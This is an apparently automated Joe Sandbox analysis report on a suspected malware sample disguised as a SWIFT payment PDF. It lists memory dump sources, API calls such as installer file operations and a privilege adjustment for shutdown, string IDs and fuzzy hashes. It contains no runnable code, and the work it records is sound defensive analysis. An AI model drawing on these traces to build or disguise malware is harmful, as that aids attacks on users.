                                                                                                                                • Instruction Fuzzy Hash: 42C04C312A42048FD6409B5ED989A5677ACEF85B04F5058E1F6058B63ACA62FC414655
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2963886192.0000000038FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38FB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_38fb0000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 4bbdc9b25b0442db270e02a1ed493fb54f747b483925d6ed8b380c042114f268
                                                                                                                                • Instruction ID: 95b1c6ed24ba15e5a0f4f64b9b73b77bbd2f9a8975ac99bebe09d2466412563d
                                                                                                                                • Opcode Fuzzy Hash: 4bbdc9b25b0442db270e02a1ed493fb54f747b483925d6ed8b380c042114f268
                                                                                                                                • Instruction Fuzzy Hash: 04C08C346546048FDB019B1DC046A813BA8AF46B08F4000D1E5498BB32C622BC108B50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2960984662.0000000036000000.00000040.00000800.00020000.00000000.sdmp, Offset: 36000000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_36000000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 20be0a2132a73d265dcc5d9684ecc9b4b67e8d37c32d18d97354ec59f26cd2ee
                                                                                                                                • Instruction ID: 24a805838044a02a78b8e80029c6cec3b872bc9dce735b1289627d0501508dc3
                                                                                                                                • Opcode Fuzzy Hash: 20be0a2132a73d265dcc5d9684ecc9b4b67e8d37c32d18d97354ec59f26cd2ee
                                                                                                                                • Instruction Fuzzy Hash: 2DB012B29581401ACF6A5A34492EE0B2941DF7CB42B444E9E5002C10E1CC26C101C902
                                                                                                                                APIs
                                                                                                                                • SetErrorMode.KERNEL32 ref: 004032C2
                                                                                                                                • GetVersion.KERNEL32 ref: 004032C8
                                                                                                                                • #17.COMCTL32(00000007,00000009,SETUPAPI,USERENV,UXTHEME), ref: 00403318
                                                                                                                                • OleInitialize.OLE32(00000000), ref: 0040331F
                                                                                                                                • SHGetFileInfoW.SHELL32(0042B228,00000000,?,?,00000000), ref: 0040333B
                                                                                                                                • GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 00403350
                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,0043F000,00000000), ref: 00403363
                                                                                                                                • CharNextW.USER32(00000000,0043F000,?), ref: 0040338A
                                                                                                                                  • Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,?,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                                                                                                                                  • Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458
                                                                                                                                • GetTempPathW.KERNEL32(00000400,00441800), ref: 004034C5
                                                                                                                                • GetWindowsDirectoryW.KERNEL32(00441800,000003FB), ref: 004034D6
                                                                                                                                • lstrcatW.KERNEL32(00441800,\Temp), ref: 004034E2
                                                                                                                                • GetTempPathW.KERNEL32(000003FC,00441800,00441800,\Temp), ref: 004034F6
                                                                                                                                • lstrcatW.KERNEL32(00441800,Low), ref: 004034FE
                                                                                                                                • SetEnvironmentVariableW.KERNEL32(TEMP,00441800,00441800,Low), ref: 0040350F
                                                                                                                                • SetEnvironmentVariableW.KERNEL32(TMP,00441800), ref: 00403517
                                                                                                                                • DeleteFileW.KERNEL32(00441000), ref: 0040352B
                                                                                                                                  • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062
                                                                                                                                • OleUninitialize.OLE32(?), ref: 004035F6
                                                                                                                                • ExitProcess.KERNEL32 ref: 00403618
                                                                                                                                • lstrcatW.KERNEL32(00441800,~nsu,0043F000,00000000,?), ref: 0040362B
                                                                                                                                • lstrcatW.KERNEL32(00441800,0040A26C,00441800,~nsu,0043F000,00000000,?), ref: 0040363A
                                                                                                                                • lstrcatW.KERNEL32(00441800,.tmp,00441800,~nsu,0043F000,00000000,?), ref: 00403645
                                                                                                                                • lstrcmpiW.KERNEL32(00441800,00440800,00441800,.tmp,00441800,~nsu,0043F000,00000000,?), ref: 00403651
                                                                                                                                • SetCurrentDirectoryW.KERNEL32(00441800,00441800), ref: 0040366D
                                                                                                                                • DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00435000,?), ref: 004036C7
                                                                                                                                • CopyFileW.KERNEL32(00442800,0042AA28,00000001), ref: 004036DB
                                                                                                                                • CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403708
                                                                                                                                • GetCurrentProcess.KERNEL32(?,?), ref: 00403737
                                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 0040373E
                                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403753
                                                                                                                                • AdjustTokenPrivileges.ADVAPI32 ref: 00403776
                                                                                                                                • ExitWindowsEx.USER32(00000002,80040002), ref: 0040379B
                                                                                                                                • ExitProcess.KERNEL32 ref: 004037BE
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2935914078.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2935897449.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935936886.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935951829.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935979016.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpyn
                                                                                                                                • String ID: .tmp$Error launching installer$Low$NSIS Error$SETUPAPI$SeShutdownPrivilege$TEMP$TMP$USERENV$UXTHEME$\Temp$~nsu
                                                                                                                                • API String ID: 3586999533-3972089011
                                                                                                                                • Opcode ID: b76b61fe59c96232ee09de7477e4ba1d3ea630d83fddd21a04d7d9ff3721efeb
                                                                                                                                • Instruction ID: 84ba5929d45b1413e1818888a5ef7abe037fd34abcf77f3f73da9f6cce4da4cf
                                                                                                                                • Opcode Fuzzy Hash: b76b61fe59c96232ee09de7477e4ba1d3ea630d83fddd21a04d7d9ff3721efeb
                                                                                                                                • Instruction Fuzzy Hash: 35D1F870500300ABD310BF659D49A3B3AADEB8174AF51443FF581B62E2DB7D8945876E
                                                                                                                                APIs
                                                                                                                                • GetDlgItem.USER32(?,000003F9), ref: 00404B48
                                                                                                                                • GetDlgItem.USER32(?,00000408), ref: 00404B53
                                                                                                                                • GlobalAlloc.KERNEL32(?,?), ref: 00404B9D
                                                                                                                                • LoadBitmapW.USER32(0000006E), ref: 00404BB0
                                                                                                                                • SetWindowLongW.USER32(?,?,00405128), ref: 00404BC9
                                                                                                                                • ImageList_Create.COMCTL32(?,?,00000021,00000006,00000000), ref: 00404BDD
                                                                                                                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BEF
                                                                                                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404C05
                                                                                                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C11
                                                                                                                                • SendMessageW.USER32(?,0000111B,?,00000000), ref: 00404C23
                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00404C26
                                                                                                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C51
                                                                                                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C5D
                                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CF3
                                                                                                                                • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D1E
                                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D32
                                                                                                                                • GetWindowLongW.USER32(?,?), ref: 00404D61
                                                                                                                                • SetWindowLongW.USER32(?,?,00000000), ref: 00404D6F
                                                                                                                                • ShowWindow.USER32(?,00000005), ref: 00404D80
                                                                                                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E7D
                                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EE2
                                                                                                                                • SendMessageW.USER32(?,?,00000000,00000000), ref: 00404EF7
                                                                                                                                • SendMessageW.USER32(?,00000420,00000000,?), ref: 00404F1B
                                                                                                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F3B
                                                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 00404F50
                                                                                                                                • GlobalFree.KERNEL32(?), ref: 00404F60
                                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FD9
                                                                                                                                • SendMessageW.USER32(?,00001102,?,?), ref: 00405082
                                                                                                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405091
                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 004050B1
                                                                                                                                • ShowWindow.USER32(?,00000000), ref: 004050FF
                                                                                                                                • GetDlgItem.USER32(?,000003FE), ref: 0040510A
                                                                                                                                • ShowWindow.USER32(00000000), ref: 00405111
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2935914078.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2935897449.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935936886.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935951829.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935979016.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                • String ID: $M$N
                                                                                                                                • API String ID: 1638840714-813528018
                                                                                                                                • Opcode ID: 4cbb5e0717cdc748ffed23d4a8be9d35437acf42fd757cc9a3c8c6ab170577e7
                                                                                                                                • Instruction ID: 943130f726a074c81f80d4b2a4465e83a32f395645510c1f9de1d6fa8cfacfb7
                                                                                                                                • Opcode Fuzzy Hash: 4cbb5e0717cdc748ffed23d4a8be9d35437acf42fd757cc9a3c8c6ab170577e7
                                                                                                                                • Instruction Fuzzy Hash: 0A028FB0900209EFDB209F64DD85AAE7BB5FB84314F14857AF610BA2E1C7789D42DF58
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2963886192.0000000038FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38FB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_38fb0000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: "$0oAp$LjAp$LjAp$LjAp$LjAp$LjAp$LjAp$LjAp$LjAp$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q
                                                                                                                                • API String ID: 0-2009027844
                                                                                                                                • Opcode ID: 3c5055e263af7e72aa23ec190db821e60a433da0da7a2a8254d94a32fc09441b
                                                                                                                                • Instruction ID: 3c570697ae625275c4313369646fc1146d80c5660fa09c59483d87706f84d948
                                                                                                                                • Opcode Fuzzy Hash: 3c5055e263af7e72aa23ec190db821e60a433da0da7a2a8254d94a32fc09441b
                                                                                                                                • Instruction Fuzzy Hash: 21328FB4E00218CFDB64CF65C994B9DBBB2BF89300F1085A9D809AB365DB759E85CF50
                                                                                                                                APIs
                                                                                                                                • DeleteFileW.KERNEL32(?,?,74DF3420,00441800,0043F000), ref: 0040586F
                                                                                                                                • lstrcatW.KERNEL32(0042F270,\*.*,0042F270,?,?,74DF3420,00441800,0043F000), ref: 004058B7
                                                                                                                                • lstrcatW.KERNEL32(?,0040A014,?,0042F270,?,?,74DF3420,00441800,0043F000), ref: 004058DA
                                                                                                                                • lstrlenW.KERNEL32(?,?,0040A014,?,0042F270,?,?,74DF3420,00441800,0043F000), ref: 004058E0
                                                                                                                                • FindFirstFileW.KERNEL32(0042F270,?,?,?,0040A014,?,0042F270,?,?,74DF3420,00441800,0043F000), ref: 004058F0
                                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,0040A300,0000002E), ref: 00405990
                                                                                                                                • FindClose.KERNEL32(00000000), ref: 0040599F
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2935914078.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2935897449.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935936886.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935951829.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935979016.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                • String ID: \*.*
                                                                                                                                • API String ID: 2035342205-1173974218
                                                                                                                                • Opcode ID: 758a93316bd333329ed0a6d4f3bd80d9b1b6158e35c963d2e10a1872ebc8ab6d
                                                                                                                                • Instruction ID: 3422579b2d55acfa562187ab3f611d485c5dde76635b84dd87a68d04928cc13f
                                                                                                                                • Opcode Fuzzy Hash: 758a93316bd333329ed0a6d4f3bd80d9b1b6158e35c963d2e10a1872ebc8ab6d
                                                                                                                                • Instruction Fuzzy Hash: 4541F270900A04EADF21AB618C89BBF7678EF41724F14823BF801B51D1D77C49859E6E
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2963886192.0000000038FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38FB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_38fb0000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: "$0oAp$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q
                                                                                                                                • API String ID: 0-2641638890
                                                                                                                                • Opcode ID: fe029171ab8a29bb3a108bd050f5ab4e39273ab7026074a952cb14ad869bc55b
                                                                                                                                • Instruction ID: db16022deffa82ec1b2efce4a1d04794b6dcce5a1ae0753ff7d9a149a148fe91
                                                                                                                                • Opcode Fuzzy Hash: fe029171ab8a29bb3a108bd050f5ab4e39273ab7026074a952cb14ad869bc55b
                                                                                                                                • Instruction Fuzzy Hash: AB02A0B4E00218CFDB58CF69C994B9DBBB2BF89300F1085A9D409AB365DB759E85CF10
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2963886192.0000000038FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38FB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_38fb0000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: .5vq$BC8
                                                                                                                                • API String ID: 0-4090705852
                                                                                                                                • Opcode ID: 7f011e92319702a85cf131b13ec8e5f4a57f58c36862bf03ed82cacf4ce08d2b
                                                                                                                                • Instruction ID: 82d0cbbe9bf5e023a2401081108fcd527512432c47e62be6d16b3fb5189f49d9
                                                                                                                                • Opcode Fuzzy Hash: 7f011e92319702a85cf131b13ec8e5f4a57f58c36862bf03ed82cacf4ce08d2b
                                                                                                                                • Instruction Fuzzy Hash: 13628974E01228CFDB65DF69C984B9DBBB2BF89300F1085EAD409AB254DB359E81CF50
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2963886192.0000000038FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38FB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_38fb0000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: h46`i46
                                                                                                                                • API String ID: 0-4264466797
                                                                                                                                • Opcode ID: c9b9d9f1e1046d6587536348c188c199fc402e92130ff5ccb97176b4efce9bf5
                                                                                                                                • Instruction ID: cf51459239e072a4b7680a794ae908db19c5a3c9881d50e7d78e72c17f555c60
                                                                                                                                • Opcode Fuzzy Hash: c9b9d9f1e1046d6587536348c188c199fc402e92130ff5ccb97176b4efce9bf5
                                                                                                                                • Instruction Fuzzy Hash: E4C1BF74E01218CFDB15DFA5C994B9DBBB2AF89300F6081A9D409BB364DB399E85CF50
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2963886192.0000000038FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38FB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_38fb0000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: BC8
                                                                                                                                • API String ID: 0-2870475904
                                                                                                                                • Opcode ID: 4c1f486d83113a1ec2ef5766ba091e824016aa056458ddef0482f3af0b5eb5cf
                                                                                                                                • Instruction ID: fbd27110940753141e0349c08b82d6c37ae42f2a58530da5b8593f589fd5de86
                                                                                                                                • Opcode Fuzzy Hash: 4c1f486d83113a1ec2ef5766ba091e824016aa056458ddef0482f3af0b5eb5cf
                                                                                                                                • Instruction Fuzzy Hash: 0FA19C74A01228CFDB65DF65C984BD9BBB2BF8A301F5085EAD40DA7250DB319E81CF51
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2963886192.0000000038FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38FB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_38fb0000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: BC8
                                                                                                                                • API String ID: 0-2870475904
                                                                                                                                • Opcode ID: b2982415c0723861ad6c8e09d5269f72a541157696e8a9dcb99775ce821aeda6
                                                                                                                                • Instruction ID: efedf86490ce9d9c55a76c6e25d5a7ac48cbe9ba81ed6158110f0de84519e66a
                                                                                                                                • Opcode Fuzzy Hash: b2982415c0723861ad6c8e09d5269f72a541157696e8a9dcb99775ce821aeda6
                                                                                                                                • Instruction Fuzzy Hash: 07518E74A01228CFCB65DF64C894B9DB7B2BB4A301F5089EAD40AB7250DB719E82CF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2963271547.0000000038410000.00000040.00000800.00020000.00000000.sdmp, Offset: 38410000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_38410000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 3637c164eb6103ab33ef3a564462b6db31137d91cd96ad187d3635ab57fbad22
                                                                                                                                • Instruction ID: fbff379acf2ffd3291ad780685ad9ef1430a9ce20bc9e068dbad1aa16e74209c
                                                                                                                                • Opcode Fuzzy Hash: 3637c164eb6103ab33ef3a564462b6db31137d91cd96ad187d3635ab57fbad22
                                                                                                                                • Instruction Fuzzy Hash: C3C1B174E01218CFDB14DFA5C994B9DBBB2AF89300F6081A9D409BB364DB359A86CF10
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2963271547.0000000038410000.00000040.00000800.00020000.00000000.sdmp, Offset: 38410000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_38410000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 70e76ad00cf0d8950d3ce20427501e4e09aa6e4c6e0efb9258a80dc4f5cbc9a7
                                                                                                                                • Instruction ID: d6c57fa2f862d71d597b767a29e99020ae641a39927306ad27395808ae1d9362
                                                                                                                                • Opcode Fuzzy Hash: 70e76ad00cf0d8950d3ce20427501e4e09aa6e4c6e0efb9258a80dc4f5cbc9a7
                                                                                                                                • Instruction Fuzzy Hash: 25C1B074E01218CFDB14DFA5C994B9DBBB2AF89300F6081A9D409BB364DB359E86CF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2963271547.0000000038410000.00000040.00000800.00020000.00000000.sdmp, Offset: 38410000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_38410000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c6a912dee921c23a86fd9ca883e52974149d4b65bfce8f64889db21eab0fa4c0
                                                                                                                                • Instruction ID: 71c8f1fc420ad99084151e31713bd9a801bb7b233503f3404d3cacb1c52c6a13
                                                                                                                                • Opcode Fuzzy Hash: c6a912dee921c23a86fd9ca883e52974149d4b65bfce8f64889db21eab0fa4c0
                                                                                                                                • Instruction Fuzzy Hash: ACC1A074E01218CFDB14DFA5C994B9DBBB2AF89300F6081A9D409BB764DB359E86CF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2963271547.0000000038410000.00000040.00000800.00020000.00000000.sdmp, Offset: 38410000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_38410000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 7a37eff12521fce7fbbed2da41a3544e134445530296cfacf63b21ea1ec541d5
                                                                                                                                • Instruction ID: 153c2b7b9df604a15094707300188c5261a5f3c03796826535fc907385a33170
                                                                                                                                • Opcode Fuzzy Hash: 7a37eff12521fce7fbbed2da41a3544e134445530296cfacf63b21ea1ec541d5
                                                                                                                                • Instruction Fuzzy Hash: 22C1B178E01218CFDB54DFA5C994B9DBBB2AF89300F6081A9D409BB365DB359E85CF10
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2963271547.0000000038410000.00000040.00000800.00020000.00000000.sdmp, Offset: 38410000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_38410000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 73934cece729d4fe680cb7c1d3853e2ce63b2ce3c0d79cda50decaab621dd9d6
                                                                                                                                • Instruction ID: e684a4f12a3e45d6903e2f8f4348d1081ec661f073374e002071255ed63f7d37
                                                                                                                                • Opcode Fuzzy Hash: 73934cece729d4fe680cb7c1d3853e2ce63b2ce3c0d79cda50decaab621dd9d6
                                                                                                                                • Instruction Fuzzy Hash: 99C190B5E01218CFDB14DFA5C994B9DBBB2AF89300F6081A9D409BB364DB359E85CF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2963271547.0000000038410000.00000040.00000800.00020000.00000000.sdmp, Offset: 38410000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_38410000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 55d2d1e6c13f495d0b7c5f3e37740b37030004f685590727469eb067bf138be4
                                                                                                                                • Instruction ID: c872c4fcc7c4c30e46ea3a1233983fceff06f018cad8356e564d5f09767b22b9
                                                                                                                                • Opcode Fuzzy Hash: 55d2d1e6c13f495d0b7c5f3e37740b37030004f685590727469eb067bf138be4
                                                                                                                                • Instruction Fuzzy Hash: A6C1A178E01218CFDB54DFA5C994B9DBBB2AF89300F6081A9D409BB365DB359E85CF10
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2963886192.0000000038FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38FB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_38fb0000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: cf3f69260342c304d3ad1b9b25e1fa9c35347a95e17b44f48e50943733959236
                                                                                                                                • Instruction ID: a25c4ca7cab84a3f59d5a5298a783ec6c07a281ac49507f0e4317bbe44a3f78e
                                                                                                                                • Opcode Fuzzy Hash: cf3f69260342c304d3ad1b9b25e1fa9c35347a95e17b44f48e50943733959236
                                                                                                                                • Instruction Fuzzy Hash: 4FC1BF78E00218CFDB15DFA5C984B9DBBB2AF89300F6081A9D408BB364DB359E85CF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2963886192.0000000038FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38FB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_38fb0000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a3fce31ef071e7676fda97213da72db416898b25a820cb481436258d25b30378
                                                                                                                                • Instruction ID: 4456301934b229334564fb7b2540dad3dbfeab5c386b83e6b00e9d3ba39793ba
                                                                                                                                • Opcode Fuzzy Hash: a3fce31ef071e7676fda97213da72db416898b25a820cb481436258d25b30378
                                                                                                                                • Instruction Fuzzy Hash: 37C1BF74E00218CFDB15DFA5C994B9DBBB2AF89300F6085A9D409BB364DB359E86CF10
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2963886192.0000000038FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38FB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_38fb0000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 5e12b6668be81e4ee302c33c070a959a289b737e318f4ec43ccc0f851da66fe4
                                                                                                                                • Instruction ID: eb7cf4fbe36d18a0e56ef428ca90fdd30b7abb490d9418c32701ef7bbbd9d8fb
                                                                                                                                • Opcode Fuzzy Hash: 5e12b6668be81e4ee302c33c070a959a289b737e318f4ec43ccc0f851da66fe4
                                                                                                                                • Instruction Fuzzy Hash: B6C1BF75E00218CFDB15DFA5CA84B9DBBB2AF89300F6081A9D409BB364DB359E85CF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2963886192.0000000038FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38FB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_38fb0000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a0cacfa98bb11aeb8fed889021da87a2c1355ea771065ddc47069bdc8e26b0d2
                                                                                                                                • Instruction ID: aaccbdd3b3e87db9cd62362749bb3b812c52bb621cdb0a49bf1d4a94563f9578
                                                                                                                                • Opcode Fuzzy Hash: a0cacfa98bb11aeb8fed889021da87a2c1355ea771065ddc47069bdc8e26b0d2
                                                                                                                                • Instruction Fuzzy Hash: BAC1BF74E00218CFDB15DFA5C994B9DBBB2AF89300F6085A9D409BB364DB359E86CF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2963886192.0000000038FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38FB0000, based on PE: false
